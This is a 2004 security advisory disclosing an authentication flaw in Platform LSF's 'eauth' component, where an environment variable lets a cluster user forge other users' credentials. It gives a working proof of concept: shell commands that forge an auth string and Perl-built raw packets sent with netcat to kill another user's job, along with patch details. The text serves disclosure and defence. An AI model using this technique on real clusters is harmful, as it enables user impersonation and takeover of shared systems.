Lam3rZ Security Advisory #2/2004 23 Feb 2004 Remote (within a cluster) root in LSF Name: Load Sharing Facility versions 4.x, 5.x, 6.x Severity: High Vendor URL: http://www.platform.com Author: Tomasz Grabowski (cadence@aci.com.pl) Vendor notified: 29 Oct 2003 Vendor confirmed: 30 Oct 2003 Vendor advisory: 9 Feb 2004 Note: ----- This vulnerability differs from the one described in Lam3rZ Security Advisory #1/2004. Impact: ------- "eauth" is the component within LSF which controls authenication. It can be exploited to send commands to LSF on behalf of a different user. In this way a user could submit and control jobs on behalf of other users. This security risk is contained to "local cluster". This means that it can be exploited remotely (from one host to another) but only between hosts within the LSF cluster. Description: ------------ "eauth" has a very dangerous undocumented feature. Namely, during its execution, it is checking for LSF_EAUTH_UID environment variable. If it finds it, it is using it instead of the real UID of the user which invoked "eauth" binary. This way attacker is able to generate authentication string of any user in the system. It can be used to control processes on behalf of other users in the cluster. Moreover, as such authentication string is used for some administrative commands, attacker is able to control the cluster itself. In order to steal other user's process attacker needs to know authentication data for that user. In most cases she will need just "lsfadmin" authentication data, because this user can control other user's processes, but let's say she wants to steal process from user "cadence". $cat /etc/passwd|grep cadence cadence:x:500:500:Tomasz Grabowski:/home/cadence:/bin/bash $ export LSF_EAUTH_UID=500 $ eauth -c hostname ,',0/%+-$%$&&,/) Now, she needs to send packets. She can do it, for the sake of simplicity, using Perl and NetCat software: ( # first packet perl -e 'print "\x04\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00"; print "\x00\x00\x00\x00"; ' sleep 1; #let's call it a header, packet length perl -e 'print "\x00\x04\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x40"; #below we provide UID, GID and length of user name print "\x00\x00\x00\x00\x00\x00\x03\xee\x00\x00\x03\xee\x00\x00\x00\x07"; #below is the user name, end indicator, and probably auth data field length print "\x63\x61\x64\x65\x6e\x63\x65\x00\x00\x00\x00\x03\x00\x00\x00\x10"; #again authentication length and auth data itself print "\x00\x00\x00\x10\x2a\x30\x26\x24\x21\x25\x2e\x23\x2c\x23\x27\x2d"; #rest of auth data, end indicator, question code (x09 - bkill) and process number print "\x2f\x28\x2b\x25\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00\x77"; print "\x00\x00\x00\x00"; ' #send it to the target daemon ) | nc 192.168.10.106 6881 After sending these two packets, she will kill process number 119 belonging to user "cadence". How to patch: ------------- This problem has been directly addressed in a security patch released for LSF. The fix is contained to the "eauth" binary which will need to be replaced for each platform used in the cluster. The patch can be downloaded from Platform FTP site. FTP: ftp.platform.com Path: patches//os//eauth* Example: patches/5.1/os/sparc-sol7-64/eauth5.1_sparc-sol7-64.Z If the OS or version is not currently available, it can be built on demand. Please contact Platform Technical Support if you have any questions or concerns. Phone: 1-877-444-4573 Email: support@platform.com References: ----------- This bug was confirmed in Platform's official security advisory dated 9 Feb 2004. It is accessible directly from Platform as Knowledge Base Article KB1-5T4XV. -- Tomasz Grabowski Technical University of Szczecin, +48 (91)4494234 Academic Centre of Computer Science www.man.szczecin.pl